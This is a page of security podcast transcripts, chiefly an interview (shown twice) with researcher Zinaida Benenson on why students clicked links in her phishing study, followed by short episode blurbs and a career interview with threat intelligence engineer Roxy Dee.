[Inside Out Security] Zinaida Benenson is a senior researcher at the University of Erlangen-Nuremberg. Her research focuses on the human factors connections in privacy and security, and she also explores IoT security, two topics which we are also very interested in at the Inside Out Security blog. Zinaida recently completed research into phishing. If you were at last year's Black Hat Conference, you heard her discuss these results in a session called How To Make People Click On Dangerous Links Despite Their Security Awareness.
So, welcome Zinaida.
[Zinaida Benenson] Okay. So my group is called Human Factors In Security And Privacy. But also, as you said, we are also doing technical research on the internet of things. And mostly when we are talking about human factors, we think about how people make decisions when they are confronted with security or privacy problems, and how can we help them in making those decisions better.
[IOS] What brought you to my attention was the phishing study you presented at Black Hat, I think that was last year. And it was just so disturbing, after reading some of your conclusions and some of the results.
But before we talk about them, can you describe that specific experiment you ran phishing college students using both email and Facebook?
In reality, this link led to an “access denied” page, but the links were individual. So we could see who clicked, and how many times they clicked. And later, we sent to them a questionnaire where we asked for reasons of their clicking or not clicking.
[IOS] Right. So basically, they were told that they would be in an experiment but they weren't told that they would be phished.
[ZB] Yes. So recruiting people for, you know, cyber security experiments is always tricky because you can't tell them the real goal of the experiment — otherwise, they would be extra vigilant. But on the other hand, you can't just send to them something without recruiting them. So this is an ethical problem. It's usually solved by recruiting people for something similar. So in our case, it was a survey for... about the internet habits.
[IOS] And after the experiment, you did tell them what the purpose was?
[ZB] Yes, yes. So this is called a debriefing and this also a special part of ethical requirements. So we sent to them an email where we described the experiment and also some preliminary results, and also described why it could be dangerous to click on a link in an email or a Facebook message.
[IOS] Getting back to the actual phish content, the phish messaging content, in the paper I saw, you showed the actual template you used. And it looked — I mean, as we all get lots of spam – to my eyes and I think a lot of people's eyes, it just looked like really obvious spam. Yet, you achieved like very respectable click rates, and I think for Facebook, you got a very high rate – almost, was it 40% – of people clicking what looked like junk mail!
[ZB] We had a bare IP address in the link, which should have alerted some people. I think it actually alerted some who didn't click.. But, yes, depending on the formulation of the message, we had 20% to over 50% of email users clicking.
And independently on the formulation of the message, we had around 40% of users clicking. So in all cases, it's enough, for example, to get a company infected with malware!
[ZB] So the reasons. The most important or most frequently stated reason for clicking was curiosity. People were amused that the message was not addressed to them, but they were interested in the pictures.
And the next most frequently stated reason was that the message actually was plausible because people actually went to a party last week, and there were people there that they did not know. And so they decided that it's quite plausible to receive such a message.
[IOS] However, it was kind of a very generic looking message. So it's a little hard to believe, to me, that they thought it somehow related to them!
[ZB] We should always consider the targeting audience. And this was students, and students communicate informally. Quite often, people have friends and even don't know their last names. And of course, I wouldn't send … if I was sending such a phishing email to, say employees of a company, or to general population, I wouldn't formulate it like this. So our targeting actually worked quite well.
[IOS] So it was almost intentional that it looked...it was intentional that it looked informal and something that a college student might send to another one. "Hey, I saw you at a party." Now, I forget, was the name of the person receiving the email mentioned in the content or not? It just said, "Hey"?
[ZB] We had actually two waves of the experiment. In the first wave, we mentioned people's names and we got over 50% of email recipients' click. And this was very surprising for us because we actually expected that on Facebook, people would click more just because people share pictures on Facebook, and it's easier to find a person on Facebook, or they know, okay, there is a student, it is a student and say, her first name is Sabrina or whatever.
And so we were absolutely surprised to learn that over 50% of email recipients clicked in the first wave of the experiment! And we thought, "Okay, why could this be?" And we decided that maybe it was because we addressed people by their first names. So it was like, "Hey, Anna."
And so we decided to have the second wave of the experiment where we did not address people by their first names, but just said, "Hey." And so we got the same, or almost the same, clicking rate on Facebook. But a much lower clicking rate on email.
[IOS] And I think you had an explanation for that, if you had a theory about why that may be, why the rates were similar [for Facebook]?
[ZB] Yeah. So on Facebook, it seems that it doesn't matter if people are addressed by name. Because as I said, the names of people on Facebook are very salient. So when you are looking up somebody, you can see their names.
But if somebody knows my email address and knows my name, it might seem to some people …. more plausible. But this is just ... we actually didn't have any people explaining this in the messages. Also, we got a couple of people saying on email that, "Yeah, well, we didn't click that. Oh, well it didn't address me by name, so it looked like spam to me."
So actually … names in emails seem to be important, even if at our university, email addresses consist of first name, point, second name, at university domain.
[IOS] I thought you also suggested that because Facebook is a community, that there's sort of a higher level of trust in Facebook than in just getting an email. Or am I misreading that?
[ZB] Well, it might be. It might be like this. But we did not check for this. And actually, there are different research. So some other people did some research on how well people trust Facebook and Facebook members. And yeah, people defer quite a lot, and I think that people use Facebook, not because they particularly trust it, but because it's very convenient and very helpful for them.
[ZB] Well, first of all, we were surprised how honestly people answered. And saying, "Oh, I was curious about pictures of unknown people and an unknown party." It's a negative personality trait, yeah? So it was very good that we had an anonymous questionnaire. Maybe it made people, you know, answering more honestly. And I think that curiosity is, in this case, it was kind of negative, a negative personality trait.
But actually, if you think about it, it's a very positive personality trait. Because curiosity and interest motivate us to, for example, to study and to get a good job, and to be good in our job. And they are also directly connected to creativity and interaction.
[IOS] But on the other hand, curiosity can have some bad results. I think you also mentioned that even for those who were security aware, it didn't really make a difference.
[ZB] Well, we asked people if they know — in the questionnaire —we asked them before we revealed the experiment, and asked them whether they clicked or not. We asked them a couple of questions that are related to security awareness like, "Can one be infected by a virus if one clicks on an attachment in an email, or on a link?"
And when we tried to correlate, statistically correlate, the answers to this question, to this link clicking question, with people's report on whether they clicked or not, we didn't find any correlation.
So this result is preliminary, yeah. We can't say with certainty, but it seems like awareness doesn't help a lot. And again, I have a hypothesis about this, but no proof so far.
[IOS] And what is that? What is your theory?[ZB] My theory is that people can't be vigilant all the time. And psychological research actually showed that interaction, creativity, and good mood are connected to increased gullibility.
And on the other hand, the same line of research showed that vigilance, and suspicion, and an analytical approach to solving problems is connected to bad mood and increased effort. So if we apply this, it means that being constantly vigilant is connected to being in a bad mood, which we don't want!
And which is also not good for atmosphere, for example, in a firm. And with increased effort, which means that we are just tiring. And when we...at some time, we have to relax. And if the message arrives at this time, it's quite plausible for everybody, and I mean really for everybody including me, you, and every security expert in the world, to click on something!
[IOS] It also has some sort of implications for hackers, I suppose. If they know that a company just went IPO … or everyone got raises in the group, then you start phishing them and sort of leverage off their good moods!
[ZB] Well, I would suggest firstly to, you know, to make sure that they understand the users and the humans on the whole, yeah? We security people tend to consider users as you know, as nuisance, like, ‘Okay they're always doing the wrong things.’
Actually, we as security experts should protect people! And if the employees in the company were not there, then we wouldn't have our job, yeah?
So what is important is to let humans be humans … And with all their positive but also negative characteristics and something like curiosity, for example, can be both.
And to turn to technical defense I would say. Because to infect a company, one click is enough, yeah? And one should just assume that it will happen because of all these things I was saying even if people are security aware.
The question is, what happens after the click?
And there are not many examples of, you know, companies telling how they mitigate such things. So the only one I was able to find was the [inaudiable] security incident in 2011. I don't know if you remember. They were hacked and had to change, actually to exchange all the security tokens.
And they, at least they published at least a part of what happened. And yeah, that was a very tiny phishing wave that maybe reached around 10 employees and only one of them clicked. So they got infected, but they noticed, they say that they noticed it quite quickly because of other security measures.
I would say that that's what one should actually expect and that's what is the best outcome one can hope for. Yes, if one notices in time.
[IOS] I agree that IT should be aware that this will happen and that the hackers and some will get in and you should have some secondary defenses. But I was also wondering, does it also suggest that perhaps some people should not have access to email?
I mean … does this lead to a test … .and if some employees are just, you know, a little too curious, you just think, "You know what, maybe we take the email away from you for a while?"
[ZB] Well you know, you can. I mean a company can try this if they can sustain the business consequences of this, yeah? So if people don't have emails then maybe some business processes will become less efficient and also employees might become disgruntled which is also not good.
I would suggest that ... I think that it's not going to work! And at least it's not a good trade off. It might work but it's not a good trade off because, you know, all this for...If you implement a security measure that, that impairs business processes, it makes people dissatisfied!
Then you have to count in the consequences.
[IOS] I agree that IT should be aware that this will happen and that the hackers will get in and you should have some secondary defenses.
But I was also wondering, does it also suggest that perhaps some people should not have access to email? I mean ... does this lead to a test where if some employees are just, you know, a little too curious you just say, ‘You know what? Maybe we take the e-mail away from you for a while.’
[ZB] Well, you know, you can. I mean, a company can try this if they can, you know, if they can sustain the business costs and consequences of this, yeah?
So if people don't have emails then maybe some business processes will become less efficient and yeah, and also employees might become disgruntled which is also not good.
I would suggest that, I think that it's not going to work!
And at least it's not a good trade off. It might work, but it's not a good trade off because, you know, all this for...if you implement security measure that impairs our business processes and makes people dissatisfied, then you have to count in the consequences.
[IOS] I'm agreeing with you that the best defense I think is awareness really and then taking other steps. I wanted to ask you one or two more questions.
One of them is about what they call whale phishing or spear phishing perhaps is another way to say it, which is just going after not just any employee, but usually high-level executives.
And at least from some anecdotes I've heard, executives are also prone to clicking on spam just like anybody else, but your research also suggests that some of the more context you provide, the more likely you'll get these executives to click.
[ZB] Okay, so if you get more context of course you can make the email more plausible, and of course if you are targeting a particular person, there is a lot of possibilities to get information about them, and especially if it's somebody well-known like an executive of a company.
And I think that there are also some personality traits of executives that might make them more likely to click. Because, you know, they didn't get their positions by being especially cautious and not taking risk and saying all safety first!
I think that executives maybe even more risk-taking than, you know, average employee and more sure of themselves, and this might get a problem even more difficult. So it also may be even to not like being told by anybody about any kind of their behavior.
[ZB] Well, of course IoT data is everything's that is collected in our environment about us can be used to infer our preferences with quite a good precision.
So… for example we had an experiment where we were able just from room climate data, so from temperature enter the age of humidity to determine if a person is, you know, staying or sitting. And this kind of data of course can be used to target messages even more precisely
So for example if you can infer a person's mood and if you suppose if you buy from the psychological research that people in good moods are more likely to click, you might try to target people in better mood, yeah? Through the IOT data available to you or through IOT data available to you through the company that you hacked.
Yeah … point is, you know, that targeting already works very well. Yeah, you just need to know the name of the person and maybe the company this person is dealing with!
[IOS] Zinaida this was a very fascinating conversation and really has a lot of implications for how IT security goes about their job. So I'd like to thank you for joining us on this podcast!
[ZB] You're welcome. Thank you for inviting me!
When we delete a file, our computer’s user interface makes the file disappear as if it is just a simple drag and drop. The reality is that the file is still in your hard drive.
In this episode of the Inside Out Security Show, our panelists elaborate on the complexities of deleting a file, the lengths IT pros go through to obliterate a file, and surprising places your files might reside.
Kris Keyser explains, “When you’re deleting a file, you’re not necessarily deleting a file. You’re deleting the reference to that file.”
Other Articles Discussed:
Panelists: Cindy Ng, Kris Keyser, Jeff Peters, Forrest Temple
Zinaida Benenson is a researcher at the University of Erlangen-Nuremberg, where she heads the "Human Factors in Security and Privacy" group. She and her colleagues conducted a fascinating study into why people click on what appears to be obvious email spam. In the first part of our interview with Benenson, we discusses how she collected her results, and why curiosity seems to override security concerns when dealing with phish mail.
[Inside Out Security] Zinaida Benenson is a senior researcher at the University of Erlangen-Nuremberg. Her research focuses on the human factors connections in privacy and security, and she also explores IoT security, two topics which we are also very interested in at the Inside Out Security blog. Zinaida recently completed research into phishing. If you were at last year's Black Hat Conference, you heard her discuss these results in a session called How To Make People Click On Dangerous Links Despite Their Security Awareness.
So, welcome Zinaida.
[Zinaida Benenson] Okay. So my group is called Human Factors In Security And Privacy. But also, as you said, we are also doing technical research on the internet of things. And mostly when we are talking about human factors, we think about how people make decisions when they are confronted with security or privacy problems, and how can we help them in making those decisions better.
[IOS] What brought you to my attention was the phishing study you presented at Black Hat, I think that was last year. And it was just so disturbing, after reading some of your conclusions and some of the results.
But before we talk about them, can you describe that specific experiment you ran phishing college students using both email and Facebook?
In reality, this link led to an “access denied” page, but the links were individual. So we could see who clicked, and how many times they clicked. And later, we sent to them a questionnaire where we asked for reasons of their clicking or not clicking.
[IOS] Right. So basically, they were told that they would be in an experiment but they weren't told that they would be phished.
[ZB] Yes. So recruiting people for, you know, cyber security experiments is always tricky because you can't tell them the real goal of the experiment — otherwise, they would be extra vigilant. But on the other hand, you can't just send to them something without recruiting them. So this is an ethical problem. It's usually solved by recruiting people for something similar. So in our case, it was a survey for... about the internet habits.
[IOS] And after the experiment, you did tell them what the purpose was?
[ZB] Yes, yes. So this is called a debriefing and this also a special part of ethical requirements. So we sent to them an email where we described the experiment and also some preliminary results, and also described why it could be dangerous to click on a link in an email or a Facebook message.
[IOS] Getting back to the actual phish content, the phish messaging content, in the paper I saw, you showed the actual template you used. And it looked — I mean, as we all get lots of spam – to my eyes and I think a lot of people's eyes, it just looked like really obvious spam. Yet, you achieved like very respectable click rates, and I think for Facebook, you got a very high rate – almost, was it 40% – of people clicking what looked like junk mail!
[ZB] We had a bare IP address in the link, which should have alerted some people. I think it actually alerted some who didn't click.. But, yes, depending on the formulation of the message, we had 20% to over 50% of email users clicking.
And independently on the formulation of the message, we had around 40% of users clicking. So in all cases, it's enough, for example, to get a company infected with malware!
[ZB] So the reasons. The most important or most frequently stated reason for clicking was curiosity. People were amused that the message was not addressed to them, but they were interested in the pictures.
And the next most frequently stated reason was that the message actually was plausible because people actually went to a party last week, and there were people there that they did not know. And so they decided that it's quite plausible to receive such a message.
[IOS] However, it was kind of a very generic looking message. So it's a little hard to believe, to me, that they thought it somehow related to them!
[ZB] We should always consider the targeting audience. And this was students, and students communicate informally. Quite often, people have friends and even don't know their last names. And of course, I wouldn't send … if I was sending such a phishing email to, say employees of a company, or to general population, I wouldn't formulate it like this. So our targeting actually worked quite well.
[IOS] So it was almost intentional that it looked...it was intentional that it looked informal and something that a college student might send to another one. "Hey, I saw you at a party." Now, I forget, was the name of the person receiving the email mentioned in the content or not? It just said, "Hey"?
[ZB] We had actually two waves of the experiment. In the first wave, we mentioned people's names and we got over 50% of email recipients' click. And this was very surprising for us because we actually expected that on Facebook, people would click more just because people share pictures on Facebook, and it's easier to find a person on Facebook, or they know, okay, there is a student, it is a student and say, her first name is Sabrina or whatever.
And so we were absolutely surprised to learn that over 50% of email recipients clicked in the first wave of the experiment! And we thought, "Okay, why could this be?" And we decided that maybe it was because we addressed people by their first names. So it was like, "Hey, Anna."
And so we decided to have the second wave of the experiment where we did not address people by their first names, but just said, "Hey." And so we got the same, or almost the same, clicking rate on Facebook. But a much lower clicking rate on email.
[IOS] And I think you had an explanation for that, if you had a theory about why that may be, why the rates were similar [for Facebook]?
[ZB] Yeah. So on Facebook, it seems that it doesn't matter if people are addressed by name. Because as I said, the names of people on Facebook are very salient. So when you are looking up somebody, you can see their names.
But if somebody knows my email address and knows my name, it might seem to some people …. more plausible. But this is just ... we actually didn't have any people explaining this in the messages. Also, we got a couple of people saying on email that, "Yeah, well, we didn't click that. Oh, well it didn't address me by name, so it looked like spam to me."
So actually … names in emails seem to be important, even if at our university, email addresses consist of first name, point, second name, at university domain.
[IOS] I thought you also suggested that because Facebook is a community, that there's sort of a higher level of trust in Facebook than in just getting an email. Or am I misreading that?
[ZB] Well, it might be. It might be like this. But we did not check for this. And actually, there are different research. So some other people did some research on how well people trust Facebook and Facebook members. And yeah, people defer quite a lot, and I think that people use Facebook, not because they particularly trust it, but because it's very convenient and very helpful for them.
[ZB] Well, first of all, we were surprised how honestly people answered. And saying, "Oh, I was curious about pictures of unknown people and an unknown party." It's a negative personality trait, yeah? So it was very good that we had an anonymous questionnaire. Maybe it made people, you know, answering more honestly. And I think that curiosity is, in this case, it was kind of negative, a negative personality trait.
But actually, if you think about it, it's a very positive personality trait. Because curiosity and interest motivate us to, for example, to study and to get a good job, and to be good in our job. And they are also directly connected to creativity and interaction.
[IOS] But on the other hand, curiosity can have some bad results. I think you also mentioned that even for those who were security aware, it didn't really make a difference.
[ZB] Well, we asked people if they know — in the questionnaire —we asked them before we revealed the experiment, and asked them whether they clicked or not. We asked them a couple of questions that are related to security awareness like, "Can one be infected by a virus if one clicks on an attachment in an email, or on a link?"
And when we tried to correlate, statistically correlate, the answers to this question, to this link clicking question, with people's report on whether they clicked or not, we didn't find any correlation.
So this result is preliminary, yeah. We can't say with certainty, but it seems like awareness doesn't help a lot. And again, I have a hypothesis about this, but no proof so far.
[IOS] And what is that? What is your theory?[ZB] My theory is that people can't be vigilant all the time. And psychological research actually showed that interaction, creativity, and good mood are connected to increased gullibility.
And on the other hand, the same line of research showed that vigilance, and suspicion, and an analytical approach to solving problems is connected to bad mood and increased effort. So if we apply this, it means that being constantly vigilant is connected to being in a bad mood, which we don't want!
And which is also not good for atmosphere, for example, in a firm. And with increased effort, which means that we are just tiring. And when we...at some time, we have to relax. And if the message arrives at this time, it's quite plausible for everybody, and I mean really for everybody including me, you, and every security expert in the world, to click on something!
[IOS] It also has some sort of implications for hackers, I suppose. If they know that a company just went IPO … or everyone got raises in the group, then you start phishing them and sort of leverage off their good moods!
[ZB] Well, I would suggest firstly to, you know, to make sure that they understand the users and the humans on the whole, yeah? We security people tend to consider users as you know, as nuisance, like, ‘Okay they're always doing the wrong things.’
Actually, we as security experts should protect people! And if the employees in the company were not there, then we wouldn't have our job, yeah?
So what is important is to let humans be humans … And with all their positive but also negative characteristics and something like curiosity, for example, can be both.
And to turn to technical defense I would say. Because to infect a company, one click is enough, yeah? And one should just assume that it will happen because of all these things I was saying even if people are security aware.
The question is, what happens after the click?
And there are not many examples of, you know, companies telling how they mitigate such things. So the only one I was able to find was the [inaudiable] security incident in 2011. I don't know if you remember. They were hacked and had to change, actually to exchange all the security tokens.
And they, at least they published at least a part of what happened. And yeah, that was a very tiny phishing wave that maybe reached around 10 employees and only one of them clicked. So they got infected, but they noticed, they say that they noticed it quite quickly because of other security measures.
I would say that that's what one should actually expect and that's what is the best outcome one can hope for. Yes, if one notices in time.
[IOS] I agree that IT should be aware that this will happen and that the hackers and some will get in and you should have some secondary defenses. But I was also wondering, does it also suggest that perhaps some people should not have access to email?
I mean … does this lead to a test … .and if some employees are just, you know, a little too curious, you just think, "You know what, maybe we take the email away from you for a while?"
[ZB] Well you know, you can. I mean a company can try this if they can sustain the business consequences of this, yeah? So if people don't have emails then maybe some business processes will become less efficient and also employees might become disgruntled which is also not good.
I would suggest that ... I think that it's not going to work! And at least it's not a good trade off. It might work but it's not a good trade off because, you know, all this for...If you implement a security measure that, that impairs business processes, it makes people dissatisfied!
Then you have to count in the consequences.
[IOS] I agree that IT should be aware that this will happen and that the hackers will get in and you should have some secondary defenses.
But I was also wondering, does it also suggest that perhaps some people should not have access to email? I mean ... does this lead to a test where if some employees are just, you know, a little too curious you just say, ‘You know what? Maybe we take the e-mail away from you for a while.’
[ZB] Well, you know, you can. I mean, a company can try this if they can, you know, if they can sustain the business costs and consequences of this, yeah?
So if people don't have emails then maybe some business processes will become less efficient and yeah, and also employees might become disgruntled which is also not good.
I would suggest that, I think that it's not going to work!
And at least it's not a good trade off. It might work, but it's not a good trade off because, you know, all this for...if you implement security measure that impairs our business processes and makes people dissatisfied, then you have to count in the consequences.
[IOS] I'm agreeing with you that the best defense I think is awareness really and then taking other steps. I wanted to ask you one or two more questions.
One of them is about what they call whale phishing or spear phishing perhaps is another way to say it, which is just going after not just any employee, but usually high-level executives.
And at least from some anecdotes I've heard, executives are also prone to clicking on spam just like anybody else, but your research also suggests that some of the more context you provide, the more likely you'll get these executives to click.
[ZB] Okay, so if you get more context of course you can make the email more plausible, and of course if you are targeting a particular person, there is a lot of possibilities to get information about them, and especially if it's somebody well-known like an executive of a company.
And I think that there are also some personality traits of executives that might make them more likely to click. Because, you know, they didn't get their positions by being especially cautious and not taking risk and saying all safety first!
I think that executives maybe even more risk-taking than, you know, average employee and more sure of themselves, and this might get a problem even more difficult. So it also may be even to not like being told by anybody about any kind of their behavior.
[ZB] Well, of course IoT data is everything's that is collected in our environment about us can be used to infer our preferences with quite a good precision.
So… for example we had an experiment where we were able just from room climate data, so from temperature enter the age of humidity to determine if a person is, you know, staying or sitting. And this kind of data of course can be used to target messages even more precisely
So for example if you can infer a person's mood and if you suppose if you buy from the psychological research that people in good moods are more likely to click, you might try to target people in better mood, yeah? Through the IOT data available to you or through IOT data available to you through the company that you hacked.
Yeah … point is, you know, that targeting already works very well. Yeah, you just need to know the name of the person and maybe the company this person is dealing with!
[IOS] Zinaida this was a very fascinating conversation and really has a lot of implications for how IT security goes about their job. So I'd like to thank you for joining us on this podcast!
[ZB] You're welcome. Thank you for inviting me!
While some management teams are afraid of a pentest or risk assessment, other organizations - particularly financial institutions - are well aware of their security risks. They are addressing these risks by simulating fake cyberattacks. By putting IT, managers, board members and executives who would be responsible for responding to a real breach or attack, they are learning how to respond to press, regulators, law enforcement, as well as other scenarios they might not otherwise expect.
However, other security experts would argue that cyber war rooms are financially prohibitive for most organizations with a limited budget. What’s more, organizations should keep in mind that not all attacks have to be complicated. If organizations curb phishing attacks or achieve a least privilege model, they would already significantly reduce their risk.
Other Articles Discussed:
Panelists: Cindy Ng, Mike Buckbee, Kris Keyser, Kilian Englert
Some of you might be familiar with Roxy Dee’s infosec book giveaways. Others might have met her recently at Defcon as she shared with infosec n00bs practical career advice. But aside from all the free books and advice, she also has an inspiring personal and professional story to share.
In our interview, I learned about her budding interest in security, but lacked the funds to pursue her passion. How did she workaround her financial constraint? Free videos and notes with Professor Messer! What’s more, she thrived in her first post providing tech support for Verizon Fios. With grit, discipline and volunteering at BSides, she eventually landed an entry-level position as a network security analyst.
Now she works as a threat intelligence engineer and in her spare time, she writes how-tos and shares sage advice on her Medium account, @theroxyd
We currently have a huge security shortage, and people are making analogies as to the kind of people we should hire. For instance, if you're able to pick up music, you might be able to pick up technology. And I've found that in security it's extremely important to be detail oriented, because the adage is the bad guys only need to be right once and security people need to be right all the time. And I had read on your Medium account the way you got into security, for practical reasons. And so let's start there, because it might help encourage others to start learning about security on their own. Tell us what aspect of security you found interesting and the circumstances that led you in this direction. –
Roxy Dee: Just to comment on what you've said. Actually, that's a really good reason to make sure you have a diverse team is because everybody has their own special strengths and having a diverse team means that you'll be able to fight the bad guys a lot better because there will always be someone that has that strength where it's needed. The bad guys, they can develop their own team the way they want and so it's important to have a diverse team because every bad guy you meet is going to be different. That's a very good point, itself.
Cindy Ng: Can you clarify "diverse?" You mean everybody on your team is going to have their own specialty that they're really passionate about? By knowing what they're passionate about, you know how to leverage their skill set? Is that what you mean by diversity?
Roxy Dee: Yeah. That's part of it. I mean, just making sure that you don't have the same person. For example, I'll tell my story like you asked in the original question. As a single mom, I have a different experience than someone that has had less difficulties in that area, so I might think of things differently, or be resourceful in different ways. Or I'm not really that great at writing reports. I can write well, but I haven't had the practice of writing reports. Somebody that went to college, they might have that because they were kind of forced to do it, by having people from different backgrounds that have had different struggles.
And I got into security because I was already into phone phreaking, which is a way of hacking the phone system. And so for me, when I went to my first 2600 Meeting and they were talking about computer security and information security, it was a new topic and I was kind of surprised. I was like, "I thought 2600 was just about phone hacking." But I realized that at the time...It was 2011, and phone hacking had become less of a thing and computer security became more of something. I got the inspiration to go that route, because I realized that it's very similar. But as a single mom, I didn't have the time or the money to go to college and study for it. So I used a lot of self-learning techniques, I went to a lot of conferences, I surrounded myself with people that were interested in the topic, and through that I was able to learn what I needed to do to start my career.
Cindy Ng: People have trouble learning the vocabulary because it's like learning a new language. How did you...even though you were into phone hacking and the transition into computer security, it has its own distinct language, how did you make the connections and how long did it take you? What experiences did you surround yourself with to cultivate a security mindset?
Roxy Dee: I've been on computers since I was a little kid, like four or five years old. So for me, it may not be as difficult for me as other people, because I kind grew up on computers. Having that background helped. But when it came to information security, there were a lot of times where I had no idea what people were saying. Like I did not know what "Reverse Engineering" meant, or I didn't know what "Trojan" meant. And now, it's like, "Oh, I obviously know what those things are." But I had no idea what people were talking about. So going to conferences and watching DEF CON talks, and listening to people. But by the time I had gone to DEF CON about three times, I think it was my third time I went to DEF CON, I thought, "Wow. I actually know what people are saying now." And it's just a gradual process, because I didn't have that formal education.
There were a few conferences that I volunteered at. Mostly at BSides. And BSides are usually free anyway. When you volunteer, you become more visible in the community, and so people will come to you or people will trust you with things. And that was a big part of my career, was networking with people and becoming visible in the community. That way, if I wanted to apply for a job, if I already knew someone there or if I knew someone that knew someone, it was a lot easier to get my resume pushed to the hiring manager than if I just apply.
Cindy Ng: How were you able to land your first security job?
Roxy Dee: And as far as my first InterSec job, I was working in tech support and I was doing very well at it. I was at the top of the metrics, I was always in like the top 10 agents.
Cindy Ng: What were some of the things that you were doing?
Roxy Dee: It was tech support for Verizon Fios. There was a lot of, "Restart your router," "Restart your set-top box," things like that. But I was able to learn how to explain things to people in ways that they could understand. So it really helped me understand tech speak, I guess, understand how to speak technically without losing the person, like a non-technical person.
Cindy Ng: And then how did you transition into your next role?
Roxy Dee: It all had to do with networking, and at this point, I had volunteered for a few BSides. So actually, someone that I knew at the time told me about a position that was an entry-level network security analyst, and all I needed to do was get my Security+ certification within the first six months of working there. And so it was an opportunity for me because they accepted entry-level. And when they gave me the assessment that they give people they interview, I aced it because I had studied already about networking through a website called "Professor Messer." And that website actually helped me with Security+ as well, and I was just able to do that through YouTube videos, like his entire website is just YouTube videos. So once I got there, I took my Security plus and I ended up, actually, on the night shift. So I was able to study in quiet during my shift every day at work. I just made it a routine, "I have to spend, you know, this amount of time studying on," whatever topic I wanted to move forward with, which I knew what to study because I was going to conferences and I was taking notes from the talks, writing down things I didn't understand or words I didn't know and then later I was researching that topic so I could understand more. And then I would watch the talk again with that understanding if it was recorded, or I would go back to my notes with that understanding. The fact that I was working overnight and I was not interrupted really helped, and then from there...and that was like a very entry-level position. And from there, I went to a cloud hosting company, secure cloud hosting company with a focus on security and the great thing about that was that it was a startup. They didn't have a huge staff, and they had a ton of things that they had to do and a bunch of unrealistic deadlines. So they would constantly be throwing me into situations I was not prepared for.
Cindy Ng: Can you give us an example?
Roxy Dee: Yeah. That was really like the best training for me, is just being able to do it. So when they started a Vulnerability Management Program, I have no experience in vulnerability management before this and they wanted me to be one of the two people on the team. So I had a manager, and then I was the only other person. Through this position, I learned what good techniques are and I was also inspired to do more research on it. And if I hadn't been given that position, I wouldn't have been inspired to look it up.
Cindy Ng: What does Vulnerability Management entail, three things that you should know?
Roxy Dee: Yeah. So Vulnerability Management has a lot to do with making sure that all the systems are up to date on patching. That's one of them. The second thing I would say that's very important is inventory management, because there were some systems that nobody was using and vulnerabilities existed there, but there was actually no one to fix them. And so if you don't take proper inventory of your systems and you don't do, you know, discovery scans to discover what's out there, you could have something sitting there that an attacker, once they get in, they could use or they might have access to. And then another thing that's really important in Vulnerability Management is actually managing the data because you'll get a lot of data. But if you don't use it properly it's pretty much useless, if you don't have a system to track when you need to have this remediated by, what are your compliance requirements? And so you have to track, "When did I discover this and when is it due? And what are the vulnerabilities and what are the systems? What do the systems look like? So there's a lot of data you're going to get and you have to manage it, or you will be completely unable to use it.
Cindy Ng: And then you moved on into something else?
Roxy Dee: Oh, yes. Actually, it being a startup kind of wore on me, to be honest. So I got a phone call from a recruiter, actually, while I was at work.
This was another situation where I had no idea how to do what I was tasked with, and the task was...So from my previous positions, I had learned how to monitor and detect, and how to set up alerts, useful alerts that can serve, you know, whatever purpose was needed. So I already had this background. So they said, "We have this application. We want you to log into it, and do whatever you need to do to detect fraud." Like it was very loosely defined what my role was, "Detect bad things happening on the website." So I find out that this application actually had been stood up four years prior and they kind of used it for a little while, but then they abandoned it.
And so my job was to bring it back to life and fix some of the issues that they didn't have time for, or they didn't actually know how to fix or didn't want to spend time fixing them. That was extremely beneficial. I had been given a task, so I was motivated to learn this application and how to use it, and I didn't know anything about fraud. So I spent a lot of time with the Fraud Operations team, and through that, through that experience of being given a task and having to do it, and not knowing anything about it, I learned a lot about fraud.
Cindy Ng: I'd love to hear from your experience what you've learned about fraud that most people might not know.
Roxy Dee: What I didn't consider was that, actually, fraud detection is very much like network traffic detection. You look for a type of activity or a type of behavior and you set up detection for it, and then you make sure that you don't have too many false positives. And it's very similar to what network security analysts do. And when I hear security people say, "Oh, I don't even know where to start with fraud," well, just think about from a network security perspective if you're a network security analyst, how you would go about detecting and alerting. And the other aspect of it is the fraudulent activity is almost always an anomaly. It's almost always something that is not normal. If you're just looking around for things that are off or not normal, you're going to find the fraud.
Cindy Ng: But how can you can tell what's normal and what's not normal?
Roxy Dee: Well, first, it's good to look up all sorts of sessions and all sorts of activity and get like a baseline of, you know, "This is normal activity." But you can also talk to the Fraud team or, you know, or whatever team handles...It's not specific to fraud, but, you know, if you're detecting something else, talk to the people that handle it. And ask them, "What would make your alerts better? What is something that has not been found before or something that you were alerted to, but it was too late?" And ask just a bunch of questions, and then you'll find through asking that what you need to detect.
Like for example, there was one situation where we had a rule that if a certain amount was sent in a certain way, like a wire, that it would alert. But what we didn't consider was, "What if there's smaller amounts that add up to a large amount?" And understanding...So we found out that, "Oh, this amount was sent out, but it was sent out in small pieces over a certain amount of time." So through talking to the Fraud Operations team, if we didn't discuss it with them, we never would have known that that was something that was an issue. So then we came up with a way to detect those types of fraudulent wire transfers as well.
Cindy Ng: How interesting. Okay. You were talking about your latest role at another bank.
Roxy Dee: I finished my contract and then I went to my current role, which focuses on a lot more than just online activity. I have more to work with now. With each new position, I just kind of layered more experience on top of what I already knew. And I know it's better to work for a company for a long time and I kind of wish these past six years, I had been with just one company.
Each time that I changed positions, I got more responsibility, pay increase, and I'm hoping I don't have to change positions as much. But it kind of gave me like a new environment to work with and kind of forced me to learn new things. So I would say, in the beginning of your career, don't settle. If you get somewhere and you don't like what you're being paid, and you don't think your career is advancing, don't be afraid to move to a different position, because it's a lot harder to ask for a raise than to just go somewhere else that's going to pay you more.
So I'm noticing a lot of the companies that I'm working for, will expect the employees to stay there without giving them any sort of incentive to stay. And so when a new company comes along, they say, you know, "Wow. She's working on this and that, and she's making x amount. And we can take all that knowledge that she learned over there, and we can basically buy it for $10,000 more than what she's making currently." So companies are interested in grabbing people from other companies that have already had the experience, because it's kind of a savings in training costs. So, you know, I try to look every six months or so, just to make sure there's not a better deal out there, because they do exist. And I don't know how that is in other fields, though. I know in information security, we have that. That's just the nature of the field right now.
Cindy Ng: I think I got a good overview of your career trajectory. I'm wondering if there's anything else that you'd want to share with our listeners?
Roxy Dee: Yeah. I guess, I pretty much have spent...So the first two or three years, I spent really working on myself, and making sure that I had all the knowledge and resources I needed to get that first job. The person that I was five or six years ago is different than who I am now. And what I mean is, my situation has changed a bit, to where I have more income and I have more capabilities than I did five years ago. One of the things that's been important to me is giving back and making sure that, you know, just because I went through struggles five years ago...You know, I understand we all have to go through our struggles. But if I can make something a little bit easier for someone that was in my situation or maybe in a different situation but still needs help, that's my way of giving back.
